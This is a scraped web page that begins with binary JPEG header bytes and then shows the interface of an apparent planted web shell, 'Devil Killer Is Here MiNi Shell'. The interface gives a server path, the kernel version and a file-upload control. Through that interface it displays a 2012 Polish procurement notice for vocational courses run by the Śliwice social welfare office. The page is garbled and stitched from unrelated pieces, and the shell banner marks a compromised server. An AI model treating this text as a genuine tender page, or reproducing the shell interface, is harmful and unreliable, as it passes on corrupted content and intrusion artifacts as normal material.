JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120626/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120626/220656-N-2012.html

<p class="kh_header"><b>Śliwice: Przedmiotem zamówienia jest organizacja i przeprowadzenie kursów zawodowych dla klientów/ek Gminnego Ośrodka Pomocy Społecznej w Śliwicach, w związku z realizacją projektu systemowego Czas na start ku lepszej przyszłości w ramach Programu Operacyjnego Kapitał Ludzki, Działanie 7.1 Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej
integracji przez ośrodki pomocy społecznej.Kursy będą odbywać się dla osób bezrobotnych, nieaktywnych zawodowo, będących w wieku aktywności zawodowej, korzystających z pomocy społecznej.</b><br>
<b>Numer ogłoszenia: 220656 - 2012; data zamieszczenia: 26.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej , ul. Ks.dr St. Sychowskiego 28, 89-530 Śliwice, woj. kujawsko-pomorskie, tel. 52 3340727, faks 52 3340728.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.sliwice.pl, www.gops-sliwice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest organizacja i przeprowadzenie kursów zawodowych dla klientów/ek Gminnego Ośrodka Pomocy Społecznej w Śliwicach, w związku z realizacją projektu systemowego Czas na start ku lepszej przyszłości w ramach Programu Operacyjnego Kapitał Ludzki, Działanie 7.1 Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej
integracji przez ośrodki pomocy społecznej.Kursy będą odbywać się dla osób bezrobotnych, nieaktywnych zawodowo, będących w wieku aktywności zawodowej, korzystających z pomocy społecznej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Blok I Kurs Prawa jazdy kat. B Krótki opis ze wskazaniem wielkości lub zakresu zamówienia: 1.Zamawiający wymaga aby kurs teoretyczny odbywał się na terenie Śliwic od poniedziałku do piątku z wyłączeniem świąt w przedziale czasowym od godz. 9:00 do godz. 14:00.2.Wykonawca zobowiązany jest do realizacji kursu na wysokim poziomie, dostosowanego do specyfiki szkolenia z zachowaniem wymogów sanitarnych, przepisów BHP i przepisów przeciwpożarowych. Sala szkoleniowa powinna być wyposażona w sprzęt niezbędny do realizacji przedmiotu zamówienia (tj. komputery posiadające oprogramowanie do przeprowadzenia egzaminu wewnętrznego, jeden telewizor lub projektor). 3.Wykonawca powinien zapewnić salę, sprzęt, urządzenia, materiały niezbędne do prawidłowego i terminowego wykonania zamówienia. 4.Liczba uczestników kursu - 7 osób. 5.Czas trwania kursu -60 h na 1 osobę 6.Termin rozpoczęcia kursu: lipiec 2012 r., a zakończenie kursu - maksymalnie do 15 listopada 2012 r. 7.Wykonawca podczas kursu winien przekazać wiedze teoretyczną i praktyczną, niezbędną do kierowania pojazdami umożliwiającą przystąpienie do egzaminu państwowego w WORD działającym na podstawie art. 116 ustawy z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym (Dz.U. z 2005 r.Nr 108, poz. 908 z późn. zm.).8.Wykonawca zobowiązany jest do sfinansowania pierwszego podejścia do egzaminu w WORD, osobom wskazanym przez Zamawiającego.9.Zakres programowy kursu: kurs na prawo jazdy kat. B musi być zrealizowany zgodnie z ww. ustawą oraz rozporządzeniami wykonawczymi w szczególności: rozporządzeniem Ministra Infrastruktury z dnia 27 października 2005 r.w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz.U. Nr 217, poz. 1834 z późn. zm.), rozporządzeniem Ministra Infrastruktury z dnia 21 stycznia 2004 r. w sprawie wydawania uprawnień do kierowania pojazdami (Dz.U. Nr 24, poz. 215 z późn. zm.), w ilości nie mniejszej niż: - minimum 30 godzin przepisów ruchu drogowego i pomocy przedmedycznej, - 30 godzin praktycznej nauki jazdy samochodem osobowym.10. Wykonawca winien posiadać pojazd/y do nauki jazdy oznaczony/e i wyposażony e zgodnie z obowiązujący przepisami.11.Kurs prowadzony będzie przez instruktorów posiadających kwalifikacje i uprawnienia zgodne z programem szkolenia. 12.Wykonawca przeprowadzi egzamin wewnętrzny, pozwalający ocenić nabyte przez uczestników kursu umiejętności.13.Wykonawca zobowiązany jest zapewnić uczestnikom materiały dydaktyczne niezbędne do uczestnictwa w kursie opatrzone w logo EFS, UE, PO KL oraz jeden komplet materiałów dydaktycznych dla Zamawiającego14.Wykonawca zobowiązany jest oznakować miejsce prowadzenia kursu w części teoretycznej notatką zawierającą informację o treści: Kurs Prawa jazdy kat. B realizowany w ramach projektu pn. Czas na start ku lepszej przyszłości,współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. 15.Wykonawca zobowiązany jest po zakończeniu kursu w terminie trzech dni roboczych dostarczyć Zamawiającemu oryginały list obecności.16.Wykonawca zobowiązany jest po zakończeniu kursu w terminie trzech dni roboczych  dostarczyć Zamawiającemu kserokopie:a.wydanych zaświadczeń potwierdzających udział w kursie oraz  rejestr potwierdzający  ich wydanieb.dziennika zajęć edukacyjnych (zawierającego listę obecności, wymiar godzin zajęć edukacyjnych,tematy zajęć edukacyjnychc.zaświadczeń lekarskich d.protokołu z egzaminu e.list potwierdzających odbiór materiałów dydaktycznych zawierających indywidualny numer uczestnika kursu, jego dane osobowe, rodzaj wydanych materiałów dydaktycznych, datę i podpis uczestnika 17.W trakcie każdego dnia odbywanych zajęć teoretycznych Wykonawca zobowiązany jest zapewnić uczestnikowi pakiet socjalny: a) napoje (kawa, herbata, cukier, śmietanka do kawy - bez ograniczeń, sok - 0,5 l, woda - 1 l), b) 2 kostki ciasta (około 7x5 cm), np. jabłecznik, makowiec, sernik na zimno, ciasto z kremem, ciasto z galaretką i owocami,c) obiad jednodaniowy (jadłospis tygodniowy: 1 dzień: kotlet devolay (150 g), frytki (200 g), surówka z czerwonej kapusty (150 g), 2 dzień:, kotlet schabowy panierowany (150 g) z sosem (25 g), ziemniaki tłuczone (250 g), surówka z kapusty kiszonej i marchewki (150 g), 3 dzień: pieczeń wieprzowa duszona (150 g), kluski śląskie (150 g) z sosem (25 g),  surówka z kapusty pekińskiej (150 g),; 4 dzień: filet z kurczaka (150 g) z sosem (25 g), ryż (150 g) z warzywami (150 g), 5 dzień:, filet z dorsza smażony panierowany (150 g), frytki (200 g), sałatka z czerwonej kapusty (150 g), 18.Wykonawca w ogólnej cenie kursu zobowiązany jest uwzględnić wszystkie niezbędne koszty w taki sposób aby uczestnik kursu nie ponosił żadnych kosztów bezpośrednich, począwszy od niezbędnych badań lekarskich, ubezpieczenia, po koszt egzaminu z uwzględnieniem kosztu dojazdu do miejsca przeprowadzenia egzaminu i wydania dokumentów potwierdzających zdobyte uprawnienia.19.Zamawiający przekaże Wykonawcy listę uczestników w formie pisemnej, nie później niż w terminie dwóch dni przed ustalonym rozpoczęciem kursu.20.W przypadku każdorazowej absencji uczestnika kursu lub przerwania kursu Wykonawca zobowiązany jest po jednym dniu
nieobecności zawiadomić Zamawiającego, składając pisemną informację. 
Wykonawca nie może dokonać usprawiedliwienia nieobecności uczestnika kursu. Usprawiedliwienia może dokonać pracownik socjalny zaangażowany w realizację projektu. Blok  II Kurs opiekunka dziecięca z pierwszą pomocą przedmedyczną
Krótki opis ze wskazaniem wielkości lub zakresu zamówienia: 1.Przedmiotem zamówienia jest  zorganizowanie i przeprowadzenie kursu przygotowującego uczestniczki  projektu do pracy w charakterze zawodowej opiekunki  do dzieci w warunkach domowych z elementami udzielania pierwszej pomocy przedmedycznej.
2.Zamawiający wymaga aby kurs teoretyczny odbywał się na terenie Śliwic od poniedziałku do piątku, z wyłączeniem świąt w przedziale czasowym od godz. 9:00 do godz. 14:00.3.Minimalny zakres tematyczny kursu obejmuje:Okresy rozwoju dziecka,Choroby i zaburzenia (ADHD, Autyzm, MPD)Praca wychowawcza Motoryka dziecka Rozwój mowy Rozwój przez zabawę Bajki, konspektyPierwsza Pomoc Bezpieczeństwo dziecka ( urazy i nieszczęśliwe wypadki)Zasady prawne udzielania pierwszej pomocy Zadławienia -definicja, objawy zadławienia -pierwsza pomoc w zadławieniach u  dzieci Wybrane nagłe zagrożenia środowiskowe Zasady postępowania w poszczególnych przypadkach: -tonięcie - udar cieplny-odmrożenia -oparzenia -napady drgawkowe -ukąszenie.
4.Wykonawca zobowiązany jest do realizacji kursu na wysokim poziomie, dostosowanego do specyfiki szkolenia z zachowaniem wymogów sanitarnych, przepisów BHP i przepisów przeciwpożarowych. 5.Wykonawca powinien zapewnić salę, sprzęt, urządzenia, materiały niezbędne do prawidłowego i terminowego wykonania zamówienia. 6.Liczba uczestników kursu -6 osób. 7.Czas trwania kursu - 90 h na 1 osobę 8.Termin rozpoczęcia kursu: lipiec 2012 r., a zakończenie kursu - maksymalnie do 14 września 2012 r.9.Celem szkolenia jest przygotowanie teoretyczne i praktyczne oraz uzyskanie wiedzy i umiejętności umożliwiających podjęcie zatrudnienia na rynku pracy.10.Wykonawca zobowiązany jest zapewnić uczestnikom materiały dydaktyczne niezbędne do uczestnictwa w kursie opatrzone w logo EFS, UE, PO KL oraz jeden komplet materiałów dydaktycznych dla zamawiającego11.Wykonawca zobowiązany jest oznakować miejsce prowadzenia kursu notatką zawierającą informację o treści:Kurs opiekunka dziecięca z pierwszą pomocą przedmedyczną realizowany w ramach projektu pn. Czas na start ku lepszej przyszłości , współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.12.Wykonawca zobowiązany jest po zakończeniu kursu w terminie trzech dni roboczych dostarczyć Zamawiającemu oryginały list obecności 13.Wykonawca zobowiązany jest po zakończeniu kursu w terminie trzech dni roboczych  dostarczyć Zamawiającemu kserokopie:a.wydanych zaświadczeń potwierdzających udział w kursie oraz  rejestr potwierdzający  ich wydanie b.dziennika zajęć edukacyjnych (zawierającego listę obecności, wymiar godzin zajęć edukacyjnych, tematy zajęć edukacyjnych)c.zaświadczeń lekarskich
d.protokołu z egzaminue.list potwierdzających odbiór materiałów dydaktycznych zawierających indywidualny numer uczestnika kursu, jego dane osobowe, rodzaj wydanych materiałów dydaktycznych, datę i podpis uczestnika 14.W trakcie każdego dnia odbywanych zajęć Wykonawca zobowiązany jest zapewnić uczestnikowi pakiet socjalny: a) napoje (kawa, herbata, cukier, śmietanka do kawy - bez ograniczeń, sok - 0,5 l, woda - 1 l),b) 2 kostki ciasta (około 7x5 cm), np. jabłecznik, makowiec, sernik na zimno, ciasto z kremem, ciasto z galaretką i owocami,c) obiad jednodaniowy (jadłospis tygodniowy: 1 dzień: kotlet devolay (150 g), frytki (200 g), surówka z czerwonej kapusty (150 g), 2 dzień:, kotlet schabowy panierowany (150 g) z sosem (25 g), ziemniaki tłuczone (250 g), surówka z kapusty kiszonej i marchewki (150 g), 3 dzień: pieczeń wieprzowa duszona (150 g), kluski śląskie (150 g) z sosem (25 g),  surówka z kapusty pekińskiej (150 g),; 4 dzień: filet z kurczaka (150 g) z sosem (25 g), ryż (150 g) z warzywami (150 g), 5 dzień:, filet z dorsza smażony panierowany (150 g), frytki (200 g), sałatka z czerwonej kapusty (150 g), 15.Wykonawca w ogólnej cenie kursu zobowiązany jest uwzględnić wszystkie niezbędne  koszty w taki sposób aby uczestnik kursu nie ponosił żadnych kosztów bezpośrednich, począwszy od ubezpieczenia, po koszt egzaminu i wydania dokumentów potwierdzających  zdobyte uprawnienia.16.Zamawiający przekaże Wykonawcy listę uczestników w formie pisemnej, nie później niż w terminie dwóch dni przed ustalonym rozpoczęciem kursu.17.W przypadku każdorazowej absencji uczestnika kursu lub przerwania kursu Wykonawca zobowiązany jest po jednym dniu nieobecności zawiadomić Zamawiającego, składając pisemną informację.Wykonawca nie może dokonać usprawiedliwienia nieobecności uczestnika kursu. Usprawiedliwienia może dokonać pracownik socjalny zaangażowany w realizację projektu. Kurs kucharz z elementami cateringu Krótki opis ze wskazaniem wielkości lub zakresu zamówienia: 1.Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie kursu kucharz z elementami cateringu.2.Zamawiający wymaga, aby kurs teoretyczny odbywał się na terenie Śliwic od poniedziałku do piątku, z wyłączeniem świąt w przedziale czasowym od godz. 9:00 do godz. 14:00.3.Zamawiający wymaga, aby kurs praktyczny odbywał się na terenie Śliwic od poniedziałku do piątku ,z wyłączeniem świąt w przedziale czasowym od godz.11:00 do godz.18:00.4.Celem kursu jest przyuczenie uczestników do zawodu kucharz oraz obsługi cateringu. Nabycie przez uczestników praktycznych umiejętności z zakresu sporządzania potraw, organizacji i obsługi cateringu umożliwiających podjęcie zatrudnienia na rynku pracy. 5.Wykonawca powinien zapewnić salę, sprzęt, urządzenia, materiały niezbędne do prawidłowego i terminowego wykonania zamówienia. 6.Wykonawca zobowiązany jest do realizacji kursu na wysokim poziomie, dostosowanego do specyfiki szkolenia z zachowaniem wymogów sanitarnych, przepisów BHP i przepisów przeciwpożarowych. Sala szkoleniowa powinna być wyposażona w sprzęt niezbędny do realizacji przedmiotu zamówienia. 7.Liczba uczestników kursu -8 osób.  8.Czas trwania kursu - 120 h / na 1 osobę , w tym zajęcia praktyczne 90 h/ 1 osobę 9.Termin rozpoczęcia kursu: lipiec 2012 r., a zakończenie kursu - maksymalnie do 14 września 2012 r.10.Wykonawca zobowiązany jest zapewnić uczestnikom materiały dydaktyczne niezbędne do uczestnictwa w kursie opatrzone w logo EFS, UE, PO KL oraz jeden komplet materiałów dydaktycznych dla zamawiającego 11.Wykonawca zobowiązany jest oznakować miejsce prowadzenia kursu notatką zawierającą informację o treści: Kurs kucharz z elementami cateringu realizowany w ramach projektu pn. Czas na start ku lepszej przyszłości, współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.12.Wykonawca zobowiązany jest po zakończeniu kursu w terminie trzech dni roboczych dostarczyć Zamawiającemu oryginały list obecności 13. Wykonawca zobowiązany jest po zakończeniu kursu w terminie trzech dni roboczych dostarczyć Zamawiającemu kserokopie: a.wydanych zaświadczeń potwierdzających udział w kursie oraz  rejestr potwierdzający  ich wydanie b.dziennika zajęć edukacyjnych (zawierającego listę obecności, wymiar godzin zajęć edukacyjnych, tematy zajęć edukacyjnych)c.zaświadczeń lekarskich
d.protokołu z egzaminu e.list potwierdzających odbiór materiałów dydaktycznych zawierających indywidualny numer uczestnika kursu, jego dane osobowe, rodzaj wydanych materiałów dydaktycznych, datę i podpis uczestnika f.list potwierdzających odbiór odzieży roboczej zawierających indywidualny numer uczestnika kursu, jego dane osobowe, datę i  podpis uczestnika oraz asortyment wydanej odzieży.14.W trakcie każdego dnia odbywanych zajęć teoretycznych i praktycznych Wykonawca zobowiązany jest zapewnić uczestnikowi pakiet socjalny: a) napoje (kawa, herbata, cukier, śmietanka do kawy - bez ograniczeń, sok - 0,5 l, woda - 1 l), b) 2 kostki ciasta (około 7x5 cm), np. jabłecznik, makowiec, sernik na zimno, ciasto z kremem, ciasto z galaretką i owocami,
c)obiad jednodaniowy (jadłospis tygodniowy:1 dzień: kotlet devolay (150 g), frytki (200 g), surówka z czerwonej kapusty (150 g), 2 dzień:, kotlet schabowy panierowany (150 g) z sosem (25 g), ziemniaki tłuczone (250 g), surówka z kapusty kiszonej i marchewki (150 g), 3 dzień: pieczeń wieprzowa duszona (150 g), kluski śląskie (150 g) z sosem (25 g),  surówka z kapusty pekińskiej (150 g),; 4 dzień: filet z kurczaka (150 g) z sosem (25 g), ryż (150 g) z warzywami (150 g), 5 dzień:, filet z dorsza smażony panierowany (150 g), frytki (200 g),sałatka z czerwonej kapusty (150 g), 15.Wykonawca zobowiązany jest zapewnić uczestnikom podczas praktyk odzież roboczą,  proszek do prania 600 gram, mydło w płynie z dozownikiem 250 ml, ręcznik  50 cm x 100 cm 16. Wykonawca w ogólnej cenie kursu zobowiązany jest uwzględnić wszystkie niezbędne  koszty w taki sposób aby uczestnik kursu nie ponosił żadnych kosztów bezpośrednich,począwszy od ubezpieczenia, po koszt egzaminu i wydania dokumentów potwierdzających zdobyte uprawnienia.17. Zamawiający przekaże Wykonawcy listę uczestników w formie pisemnej, nie później niż w terminie dwóch dni przed ustalonym rozpoczęciem kursu.18.W przypadku każdorazowej absencji uczestnika kursu lub przerwania kursu Wykonawca zobowiązany jest po jednym dniu nieobecności zawiadomić  Zamawiającego, składając pisemną informację. Wykonawca nie może dokonać usprawiedliwienia nieobecności uczestnika kursu. Usprawiedliwienia może dokonać pracownik socjalny zaangażowany w realizację projektu. Kurs finansowo - księgowy 1.Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie kursu finansowo - księgowego 2.Zamawiający wymaga aby kurs prowadzony był na terenie Śliwic, w dni robocze, w godzinach od 09:00  do godz. 14:00 3.Wykonawca powinien zapewnić salę, sprzęt, urządzenia, materiały niezbędne do prawidłowego i terminowego wykonania zamówienia. 4.Wykonawca zobowiązany jest do realizacji kursu na wysokim poziomie, dostosowanego do specyfiki szkolenia z zachowaniem wymogów sanitarnych, przepisów BHP i przepisów przeciwpożarowych. Sala szkoleniowa powinna być wyposażona w sprzęt niezbędny do realizacji przedmiotu zamówienia (tj. komputery posiadające oprogramowanie programu finansowo-księgowego Symfonia, projektor). 5.Celem kursu jest przygotowanie uczestników do samodzielnego prowadzenia księgowości, sporządzania sprawozdań finansowych, rozliczeń z urzędami skarbowym i ZUS, oraz zdobycie praktycznych umiejętności prowadzenia księgowości komputerowej . 6.Liczba uczestników kursu -5 osób. 7.Czas trwania kursu - 120 h  na 1 osobę .8.Termin rozpoczęcia kursu: lipiec 2012 r., a zakończenie kursu - maksymalnie do 15 listopada 2012 r.9.Wykonawca zobowiązany jest zapewnić uczestnikom materiały dydaktyczne niezbędne do uczestnictwa w kursie opatrzone w logo EFS, UE, PO KL oraz jeden komplet materiałów dydaktycznych dla zamawiającego 10.Wykonawca zobowiązany jest oznakować miejsce prowadzenia kursu notatką zawierającą informację o treści: Kurs finansowo - księgowy realizowany w ramach projektu pn. Czas na start ku lepszej przyszłości , współfinansowany  ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.11.Przystępując do kursu uczestnik otrzymuje płytkę z programem FK Symfonia (do wykorzystania w nauce własnej w domu - instalacja na domowym komputerze)12.Wykonawca zobowiązany jest po zakończeniu kursu w terminie trzech dni roboczych dostarczyć Zamawiającemu oryginały list obecności13.Wykonawca zobowiązany jest po zakończeniu kursu w terminie trzech dni roboczych dostarczyć Zamawiającemu kserokopie: a. wydanych zaświadczeń potwierdzających udział w kursie oraz  rejestr potwierdzający   ich wydanie. b.dziennika zajęć edukacyjnych (zawierającego listę obecności, wymiar godzin zajęć edukacyjnych, tematy zajęć edukacyjnychc. zaświadczeń lekarskichd.protokołu z egzaminuf.list potwierdzających odbiór materiałów dydaktycznych zawierających indywidualny numer uczestnika kursu, jego dane osobowe, rodzaj wydanych materiałów dydaktycznych, datę i podpis uczestnika
14.W trakcie każdego dnia odbywanych zajęć teoretycznych i praktycznych Wykonawca zobowiązany jest zapewnić uczestnikowi pakiet socjalny: a) napoje (kawa, herbata, cukier, śmietanka do kawy - bez ograniczeń, sok - 0,5 l, woda - 1 l), b) 2 kostki ciasta (około 7x5 cm), np. jabłecznik, makowiec, sernik na zimno, ciasto z kremem, ciasto z galaretką i owocami,c) obiad jednodaniowy (jadłospis tygodniowy: 1 dzień: kotlet devolay (150 g), frytki (200 g), surówka z czerwonej kapusty (150 g), 2 dzień:, kotlet schabowy panierowany (150 g) z sosem (25 g), ziemniaki tłuczone (250 g), surówka z kapusty kiszonej i marchewki (150 g), 3 dzień: pieczeń wieprzowa duszona (150 g), kluski śląskie (150 g) z sosem (25 g),  surówka z kapusty pekińskiej (150 g),; 4 dzień: filet z kurczaka (150 g) z sosem (25 g), ryż (150 g) z warzywami (150 g), 5 dzień:, filet z dorsza smażony panierowany (150 g), frytki (200 g), sałatka z czerwonej kapusty (150 g), 
15. Wykonawca w ogólnej cenie kursu zobowiązany jest uwzględnić wszystkie niezbędne   koszty w taki sposób aby uczestnik kursu nie ponosił żadnych kosztów bezpośrednich,  począwszy od ubezpieczenia, po koszt egzaminu i wydania dokumentów potwierdzających zdobyte uprawnienia.16. Zamawiający przekaże Wykonawcy listę uczestników w formie pisemnej, nie później   niż w terminie dwóch dni przed ustalonym rozpoczęciem kursu.17. W przypadku każdorazowej absencji uczestnika kursu lub przerwania kursu Wykonawca zobowiązany jest po jednym dniu nieobecności zawiadomić  Zamawiającego, składając pisemną informację. Wykonawca nie może dokonać  usprawiedliwienia nieobecności uczestnika kursu. Usprawiedliwienia może dokonać  pracownik socjalny zaangażowany w realizację projektu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania
Opis sposobu dokonywania oceny spełniania tego warunku
Złożone oświadczenie - Załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2.Wiedza i doświadczenie
Opis sposobu dokonywania oceny spełniania tego warunku
Złożone oświadczenie - Załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3. Potencjał techniczny
Opis sposobu dokonywania oceny spełniania tego warunku
Złożone oświadczenie - Załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>4.Osoby zdolne do wykonania zamówienia
Opis sposobu dokonywania oceny spełniania tego warunku
Złożone oświadczenie - Załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
